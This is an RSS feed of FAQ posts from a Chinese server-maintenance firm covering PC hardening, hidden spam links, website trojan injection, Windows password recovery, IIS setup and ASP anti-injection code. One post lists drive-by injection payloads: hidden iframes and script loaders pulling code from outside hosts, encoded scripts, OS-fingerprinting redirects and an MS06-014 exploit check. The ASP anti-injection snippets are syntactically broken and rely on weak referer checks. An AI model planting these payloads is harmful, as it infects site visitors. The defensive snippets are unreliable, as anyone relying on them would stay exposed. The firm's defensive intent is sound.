<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>服务器维护|网站维护|西安内网建设|西安内网维护|网站清马|服务器入侵检测|网站优化|中安互联 - 常见问题</title><link>http://www.52zlw.com/</link><description> - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright 2007-2010 服务器维护,网站维护,西安内网建设,西安内网维护. Some Rights Reserved.黑ICP备07502155号 var _bdhmProtocol = ((&amp;quot;https:&amp;quot; == document.location.protocol) ? &amp;quot; https://&amp;quot; : &amp;quot; http://&amp;quot;);document.write(unescape(&amp;quot;%3Cscript src='&amp;quot; + _bdhmProtocol + &amp;quot;hm.baidu.com/h.js%3F6d7d1830a53581a774f95b40251928dc' type='text/javascript'%3E%3C/script%3E&amp;quot;));kfguin=&amp;quot;56993168&amp;quot;;ws=&amp;quot;www.52zlw.com&amp;quot;; companyname=&amp;quot;中安互联&amp;quot;; welcomeword=&amp;quot;您好,欢迎光临中安互联服务器维护请问,有什么可以帮到您的吗?&amp;quot;; type=&amp;quot;1&amp;quot;;</copyright><pubDate>Sun, 05 Sep 2010 17:03:59 +0800</pubDate><item><title>个人电脑怎么防黑？</title><author>196900006@qq.com (中安互联)</author><link>http://www.52zlw.com/faq/55/55/55.html</link><pubDate>Tue, 03 Aug 2010 22:00:14 +0800</pubDate><guid>http://www.52zlw.com/faq/55/55/55.html</guid><description><![CDATA[<p>如何防止电脑被黑客入侵的方法？中安互联服务器维护分享一些防止电脑被黑客入侵的简单知识，希望可以对大家有些帮助。</p><p><strong>一、操作系统不要用盗版的，有后门的。</strong></p><p><strong>二、登录用户一定要设密码</strong></p><p>在控制面板的用户里 这个总知道的吧。而且要把guest禁了，右击我的电脑－&gt;管理-&gt;本地用户和组。</p><p><strong>三、补丁一定要下齐全</strong></p><p>不管是windows的还是第三方软件的。</p><p><strong>四、关闭磁盘共享</strong></p><p>也就是C、D、E、F、G、H 等 。开始－&gt;运行 输入cmd回车，在cmd输入 net share c$ /delete （ 再把C换D ，依次下去。不怎么懂dos命令的，当然也可以在管理里的共享文件夹关闭 ）。</p><p><strong>五、关闭远程访问</strong></p><p>右击我的电脑属性 －&gt;远程 把允许远程用户访问此计算机前面的点去掉。</p><p><strong>六、防火墙打开</strong></p><p>至于自动更新，看你是否是正版，盗版技术怎样。不知道的话，最好关了，以免以后造成麻烦。</p><p><strong>七、把一些完全没必要的服务关掉</strong></p><p>比如server、ipc、system restore service。关闭方法：</p><p>开始－&gt;程序-&gt;管理工具-&gt;服务(右击我的电脑管理 更快)。还有些服务具体看需求，不需要的话就关闭。</p><p>附：</p><p>computer browser 如果不需要局域共享就关了；</p><p>dhcp client 如果ip是静态的 不需要获取自动ip禁了；</p><p>print spooler 如果没有打印机 就禁用了；</p><p>shell hardware detection 如果不需要自动播放就禁了；</p><p>TCP/IP NetBIOS helper 如果不需要对netbios做解析的禁了；</p><p>themes 如果不使用个性主题就禁了；</p><p>windows time 系统校对 纯属鸡助禁了；</p><p>wireless zero configuration 如果没有无线网卡就禁了；</p><p>workstastion 如果不需要局域共享就禁了。</p><p><strong>八、防中马方法</strong></p><p>开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉，然后打开Internet Explorer浏览器，点工具-Internet选项-安全-自定义级别，把里面的脚本的3个选项全部禁用，然后把&ldquo;在中加载程序和文件&rdquo;禁用，当然这只是简单的防治方法，不过可能影响一些网页的动态java效果，不过为了安全就牺牲一点啦，这样还可以预防一些恶意的网页炸弹和病毒。个人意识方面：不要乱翻网站，特别是在在qq群上发的网址，要是发的人没说明，没更多的话坚决不打开。也不乱打开陌生发的文件。</p><p><strong>九、关闭一些搞危险和没必要的端口</strong></p><p>实际上上门第四第五条也是关闭端口那样比较方便。有一些端口不借助第三方软件是比较难关闭的，我就介绍一种万能关闭方法：</p><p>1 点击 &quot;开始菜单/设置/控制面板/管理工具&quot;，双击打开&quot;本地策月&quot;，选中&quot;ip安全策月,在本地计算机&quot;右边的空白位置右击鼠标,谈出快捷菜单,选择&quot;创建 ip安全策月&quot;，弹出向导.在向导中点击下一步下一步，当显示&quot;安全通信请求&quot;画面时，把&quot;激活默认相应规则&quot;左边的钩去掉，点&quot;完成&quot;就创建了一个新的 ip安全策月。</p><p>2 右击该ip安全策略，在&quot;属性&quot;对话框中，把&quot;使用添加向导&quot;左边的钩去掉，然后再点击右边的&quot;添加&quot;按纽添加新的规则，随后弹出&quot;新规则属性&quot; 对话框，在画面上点击&quot;添加&quot;按纽,弹出ip筛选器列表窗口.在列表中，首先把&quot;使用添加向导&quot;左边的钩去掉,然后再点击右边的&quot;添加&quot;按纽添加新的筛选器。</p><p>3 进入&quot;筛选器属性'对话框，首先看到的是寻地址,源地址选&quot;任何ip地址&quot;，目标地址选&quot;我的ip地址&quot;，点击&quot;协议&quot;选项卡，在&quot;选择协议类型 &quot;的下拉列表中选择&ldquo;tcp&quot;,然后在&quot;到此端口&quot;的下的文本框中输入&quot;135&quot;，点击确定。这样就添加了一个屏蔽tcp135 端口的筛选器，可以防止外界通过135端口连上你的电脑。点击确定后回到筛选器列表的对话框,可以看到已经添加了一条策月。重复以上步骤继续添加tcp 137 139 445 593 端口和udp 135 139 445 端口，为它们建立相应的筛选器。重复以上步骤添加tcp 125 2745 3127 6129 3389 端口的屏蔽策月，建立好上述端口的筛选器,最后点击确定按纽。</p><p>4 在&quot;新规则属性&quot;对话框中，选择&quot;新ip筛选器列表'然后点击其左边的复选框，表示已经激活。最后点击&quot;筛选器操作&quot;选项卡中，把&quot;使用添加向导 &quot;左边的钩去掉，点击&quot;添加&quot;按钮,进行&quot;阻止&quot;操作，在&quot;新筛选器操作属性&quot;的&quot;安全措施&quot;选项卡中,选择&quot;阻止&quot;,然后点击&quot;确定&quot;。</p><p>5 进入&quot;新规则属性&quot;对话框,点击&quot;新筛选器操作&quot;，选取左边的复选框,表示已经激活，点击&quot;关闭&quot;按钮，关闭对话框.最后&quot;新ip安全策月属性 &quot;对话框，在&quot;新的ip筛选器列表&quot;左边打钩，按确定关闭对话框.在&quot;本地安全策月&quot;窗口，用鼠标右击新添加的ip安全策月，然后选择&quot;指派&quot;。</p><p>重新启动后,上述端口就可以关闭了!电脑就安全多了!这种方法自己看清楚点，可能要多试几遍。查看端口的方法是&ldquo;开始&rdquo;－&gt;&ldquo;运行&rdquo; 输入cmd 回车 打开命令提示符后 再输入netstat -an （两个单词间有空格）</p><p>以上方法能对付一般的菜鸟入侵或者批量入侵。</p>]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/55/55/55.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=55</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=55&amp;key=726a835b</trackback:ping></item><item><title>我的网站被挂隐藏链接了怎么办？</title><author>196900006@qq.com (服务器维护)</author><link>http://www.52zlw.com/faq/37/37/37.html</link><pubDate>Tue, 25 May 2010 09:43:16 +0800</pubDate><guid>http://www.52zlw.com/faq/37/37/37.html</guid><description><![CDATA[问：我的网站经常被挂隐藏链接？这样对我的网站有影响吗？我如何删掉这些隐藏链接？怎么防止再出现这些隐藏连接呢？<br/><br/>答：网站经常被挂隐藏连接，这说明你的网站存在一定的知名度，PR和排名都比较靠前；同时也说明你的网站存在漏洞，并且您没能发现漏洞所在，以至于被恶意入侵者再次轻松的挂隐藏连接。<br/><br/>   我发现一般挂的隐藏连接都是批量的，一次十几这个网站，同时还有大量的私服连接，我很明确的告诉你这些连接会严重的拖累你的网站在搜索引擎的排名，导致您的收录和流量都下降，给站长带来不必要的损失<br/><br/><br/>  我在这里贴出几个常用的挂隐藏链接的代码，方便站长朋友认清楚。<br/>DIV: <br/>　　<div style="display:none;">　　<a href=http://www.52zlw.com/ <br/>　　target="_blank">服务器维护</a></div>　　 <br/>　　javascript: <br/>　　<script language="javascript" type="text/javascript"> <br/>　　document.write("<div style='display:none;'>"); <br/>　　</script><div>　　<a href=http://www.52zlw.com/>服务器维护</a> <br/>　　<script language=”javascript” type=”text/javascript”> <br/>　　document.write(”</div>”); <br/>　　</script> <br/>　　 <br/>　　html: <br/>　　<marquee height=1 width=5 SCROLLAMOUNT=3000 SCROLLDELAY=20000> <br/>　　<a href=http://www.52zlw.com/>服务器维护</a> <br/>　　</MARQUEE> <br/>　　 <br/>　　css1: <br/>　　<div style="position: absolute; top: -999px;left: -999px;">　　<a href=http://www.52zlw.com/>服务器维护</a> <br/>　　</div>　　 <br/>　　css2: <br/>　　<div style="position:absolute;left:expression(1-900);top:expression(3-999);">　　<a href=http://www.52zlw.com/>服务器维护</a> <br/>　　</div><br/>如果您的网站也被挂隐藏连接的话，不妨联系下我们，如果只是去掉隐藏连接和检测漏洞，我们是可以给您免费做的。]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/37/37/37.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=37</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=37&amp;key=f9c9bb00</trackback:ping></item><item><title>常见的网站挂马代码有哪些？</title><author>196900006@qq.com (服务器维护)</author><link>http://www.52zlw.com/faq/35/35/35.html</link><pubDate>Wed, 19 May 2010 23:33:09 +0800</pubDate><guid>http://www.52zlw.com/faq/35/35/35.html</guid><description><![CDATA[网站不安全，经常被挂马？怎么办？您可以联系我们来解决以及杜绝这种事情。<br/>本站搜集的这些挂马语句比较全，如果你的网站已经被挂马，那你就该更认真的看了.<br/><br/>挂马的代码: <br/><script src=http://a1l.cn></script> <br/>index.htm内容: <br/>document.write("<div style='display:none'>") <br/>document.write("<iframe src=http://a1l.cn/ani.htm></iframe>") <br/>document.write("<iframe src="http://a1l.cn/1.htm" width="0" height="0" <br/><br/>frameborder="0"></iframe>") <br/>document.write("</div>") <br/><br/><br/>一:框架挂马 <br/><br/><iframe src=地址 width=0 height=0></iframe> <br/><br/>二:js文件挂马 <br/><br/>首先将以下代码 <br/>document.write("<iframe width='0' height='0' src='地址'></iframe>"); <br/>保存为xxx.js， <br/>则JS挂马代码为 <br/><script language=javascript src=xxx.js></script> <br/><br/>三:js变形加密 <br/><br/><SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> <br/>muma.txt可改成任意后缀 <br/>四:body挂马 <br/><br/><body onload="window.location='地址';"> <br/><br/>五:隐蔽挂马 <br/><br/>top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe <br/><br/>src="http://www.xxx.com/muma.htm/"></iframe>'; <br/><br/>六:css中挂马 <br/><br/>body { <br/>background-image: url('javascript:document.write("<script <br/><br/>src=http://www.XXX.net/muma.js></script>")')} <br/><br/>七:JAJA挂马 <br/><br/><SCRIPT language=javascript> <br/>window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro <br/><br/>llbars=no,width=1,height=1"); <br/></script> <br/><br/>八:图片伪装 <br/><br/> <br/><iframe src="网马地址" height=0 width=0></iframe> <br/><img src="图片地址"></center> <br/> <br/><br/>九:伪装调用： <br/><br/><frameset rows="444,0" cols="*"> <br/><frame src="打开网页" framborder="no" scrolling="auto" noresize <br/><br/>marginwidth="0"margingheight="0"> <br/><frame src="网马地址" frameborder="no" scrolling="no" noresize <br/><br/>marginwidth="0"margingheight="0"> <br/></frameset> <br/><br/>十:高级欺骗 <br/><br/><a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" <br/><br/>onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a> <br/><SCRIPT Language="JavaScript"> <br/>function www_163_com () <br/>{ <br/>var url="网马地址"; <br/>open <br/><br/>(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no, <br/><br/>resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); <br/>} <br/></SCRIPT> <br/>十一:判断系统代码<br/><br/><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><br/><HTML><HEAD><TITLE>404</TITLE><br/><META http-equiv=Content-Type content="text/html; charset=windows-1252"><br/><META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD><br/><BODY><br/><SCRIPT language=javascript><br/>window.status="";<br/>if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)<br/>window.location.href="tk.htm";<br/>else<br/>window.location.href="upx06014.htm";<br/></SCRIPT><br/></BODY></HTML><br/><br/>十二:判断是否有ms06014代码<br/><br/><script language=VBScript><br/>on error resume next<br/>set server = document.createElement("object")<br/>server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"<br/>set File = server.createobject(Adodb.Stream,"")<br/>if Not Err.Number = 0 then<br/>err.clear<br/>document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")<br/>else<br/>document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")<br/>end if<br/></script><br/><br/>十三:智能读取js的代码demo<br/><br/>//读娶src的对象<br/>var v = document.getElementById("advjs");<br/>//读娶src的参数<br/>var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));<br/><br/>document.write("<iframe src=\"http://www.upx.com.cn/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");<br/>document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");<br/>document.writeln("<HTML><HEAD>");<br/>document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");<br/>document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");<br/>document.writeln("<BODY> ");<br/>document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\">");<br/>document.writeln("<DIV ");<br/>document.writeln("style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")<br/><br/>//分析src的参数函数<br/>function getUrlParameterAdv(asName,lsURL){<br/><br/>loU = lsURL.split("?");<br/>if (loU.length>1){<br/><br/>var loallPm = loU.split("&");<br/><br/>for (var i=0; i<loallPm.length; i++){<br/>var loPm = loallPm[i].split("=");<br/>if (loPm[0]==asName){<br/>if (loPm.length>1){<br/>return loPm;<br/>}else{<br/>return "";<br/>}<br/>}<br/>}<br/>}<br/>return null;<br/>}  <br/><br/><br/><br/>]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/35/35/35.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=35</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=35&amp;key=69e33daa</trackback:ping></item><item><title>怎么使服务器有效的防止webshell</title><author>196900006@qq.com (服务器维护)</author><link>http://www.52zlw.com/faq/28/28/28.html</link><pubDate>Tue, 04 May 2010 10:14:34 +0800</pubDate><guid>http://www.52zlw.com/faq/28/28/28.html</guid><description><![CDATA[<p>请输入密码查看文章及评论. 成功输入密码后, 可以直接点击查看文章, 直到关闭浏览器.<br/>此文章需要更高级别密码!</p><p><form name="edit" method="post" action="http://www.52zlw.com/plugin/GuestsEntryX/view.asp?id=28" style="padding:0 0 20px 40px;text-indent: 0;line-height:100%;"><input type="password" name="pwd" value=""  size="20" /> <input type="submit" value="查看文章" title="查看文章"/></form></p><p></p>]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/28/28/28.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=28</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=28&amp;key=77eab593</trackback:ping></item><item><title>windows 2003 忘记密码怎么办？</title><author>196900006@qq.com (服务器维护)</author><link>http://www.52zlw.com/faq/27/27/27.html</link><pubDate>Tue, 04 May 2010 09:51:04 +0800</pubDate><guid>http://www.52zlw.com/faq/27/27/27.html</guid><description><![CDATA[问：<br/>   <b>windows 2003 忘记密码怎么办？</b><br/><br/>答：<br/>  由于黑客攻击或者修改了管理员密码，或者是时间长忘记了密码，如果重装系统，既费时又麻烦而且，还会对企业带来或多或少的损失。那么我们该怎么办呢？<br/><br/>  1.刻录一张PE光盘，进PE系统再用工具修改。现在一般的ghost安装盘都有PE系统的。<br/>  2.如果web服务器上装有server-u  mysql mssql 这些程序的话，可以利用黑客技术 [<a target="_blank"  href="http://www.52zlw.com/project/19/19/19.html">服务器(网站)入侵检测服务</a>] 来提权修改管理员密码]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/27/27/27.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=27</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=27&amp;key=a2a119da</trackback:ping></item><item><title>如何设置IIS7支持ASP? </title><author>196900006@qq.com (服务器维护)</author><link>http://www.52zlw.com/faq/26/26/26.html</link><pubDate>Tue, 04 May 2010 09:46:48 +0800</pubDate><guid>http://www.52zlw.com/faq/26/26/26.html</guid><description><![CDATA[Vista默认的情况下是没有安装IIS7，所以我们要在"控制面板"里面的"程序和功能"里面点击"打开或关闭Windows功能"，在里面把对应的IIS的功能钩上，友情提示你，如果想要IIS7运行ASP.NET 1.1的程序，你需要把IIS6兼容性的这些选项一起选中。<br/><br/>对于ASP.NET2.0来说，一切要简单些，因为IIS7默认情况下是支持ASP.NET2.0的程序，只是需要自己重新建一个应用程序池，选好.Net Framework的版本2.0的，托管管道的方式选成:经典。这样应该就OK了。 <br/><br/>对于ASP.NET 1.1来说，就要复杂好多，因为IIS7一般是在.NET FrameWork 1.1后装的，所以要用:%windir%Microsoft.NETFrameworkv1.1.4322ASPnet_regIIS -i来注册你的.NET FrameWork 1.1，但是这时候你查看你的站点的时候，只要一运行ASP.NET的页面，IIS就挂掉了，这时候，经过大量的实践和搜索可以很负责任地告诉你，你没有装.NET FrameWork 1.1 SP1。装完这些后，再在池里面加上对应的应用程序池，然后设置站点，一切就OK了。 <br/><br/>　　接下来说说ASP的设置，作为一个经典的WEB框架，有时候还是得放些ASP的页面在自己机子上看看的，所以让我们一起让IIS7支持ASP吧：首先得看看是不是安装上了ASP的支持，还是在“打开或关闭Windows功能”里面，IIS下的万维网服务，应用程序开发功能里面把对应的项勾选，这时候站点里面就有ASP的选项出来了，在IIS的程序映射里面会有ASPClassic，默认的情况下应该是禁用的，这时候要编辑一下运行权限，把它启用。如果这时候还不能查看，那应该是权限还是不够，可以用以下的方式来修改：在C:UsersDefaultAppDataLocal下的Temp加上Users的权限。 ]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/26/26/26.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=26</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=26&amp;key=891d4342</trackback:ping></item><item><title>公司asp网站经常被注入挂马怎么办？</title><author>196900006@qq.com (中安互联)</author><link>http://www.52zlw.com/faq/15/15/15.html</link><pubDate>Mon, 12 Apr 2010 10:21:37 +0800</pubDate><guid>http://www.52zlw.com/faq/15/15/15.html</guid><description><![CDATA[   目前的大多数企业网站都存在着注入漏洞，这些漏洞都是由于程序员的思维和设计所遗留的问题。<br/><br/>   国内的黑客知识已经平民化，刚学不久的人便拿着 啊D  明小子之类的工具 利用googlehack 或者 baiduhack  来寻找注入目标。<br/>   <br/>    所以说，大多数企业网站都或多或少的处于被注入的情况，给企业带来一些负面影响。现提供3种ASP防注入代码，如果这些措施还不能解决您的困扰，请联系我们的工程师。<br/><br/> 解决方案： <br/><br/>那么我们怎么防注入呢？程序如下加入到asp或html或php或cgi里面都可以,经过测试。加入如 top.asp文件中开头。 <br/><br/>方法一： <br/><%if session("username"="" or session("userkey"="" then <br/>response.redirect "../../" <br/>end if <br/>%> <br/>(说明：只要有用户注入则跳转到../../目录，呵呵，看你怎么给我注入) <br/><br/>方法二： <br/><% server_v1=Cstr(Request.ServerVariables("HTTP_REFERER") <br/>server_v2=Cstr(Request.ServerVariables("SERVER_NAME") <br/>if　mid(server_v1,8,len(server_v2))<>server_v2　then <br/>response.write　"<br><br><center><table　border=1　cellpadding=20　bordercolor=black　bgcolor=#EEEEEE width=450>" <br/>response.write　"<tr><td　style=“font:9pt　Verdana“>" <br/>response.write　"你提交的路径有误，禁止从站点外部提交数据请不要乱该参数！" <br/>response.write　"</td></tr></table></center>" <br/>response.end <br/>end if <br/>%> <br/><br/>方法三： <br/><% dim From_url,Serv_url <br/>From_url = Cstr(Request.ServerVariables("HTTP_REFERER") <br/>Serv_url = Cstr(Request.ServerVariables("SERVER_NAME") <br/>if mid(From_url,8,len(Serv_url)) <> Serv_url then <br/>response.write "NO" <br/>response.redirect("../" <BR>response.end <br/>end if <br/>%> <br/><br/>SQL防注入函数 <br/><% '//SQL防注入函数，参数UnSql_Words为传入的变量或字串,UnSql_Class为类型 1数字型,2字符型 Function UnSql(UnSql_Words,UnSql_Class) If UnSql_Class = 1 Then If IsNumeric(UnSql_Words) = False Then Response.Write "<title>错误：请勿尝注非法注入</title>" Response.Write "<font size=2>服务器、网站安全维护，我信任 - 中安互联!</font>" Response.Write " <font color=#ffffff size=2>[BY 小白,QQ 196900006]</font>" Response.End() End If Else UnSql_Words = Replace(UnSql_Words,"'","") UnSql_Words = Replace(UnSql_Words,";","") UnSql_Words = Replace(UnSql_Words,"=","") UnSql_Words = Replace(UnSql_Words,">","") UnSql_Words = Replace(UnSql_Words,"<","") End If UnSql = UnSql_Words End Function %><br/><br/> <br/>]]></description><category>常见问题</category><comments>http://www.52zlw.com/faq/15/15/15.html#comment</comments><wfw:comment>http://www.52zlw.com/</wfw:comment><wfw:commentRss>http://www.52zlw.com/feed.asp?cmt=15</wfw:commentRss><trackback:ping>http://www.52zlw.com/cmd.asp?act=tb&amp;id=15&amp;key=036efeff</trackback:ping></item></channel></rss>
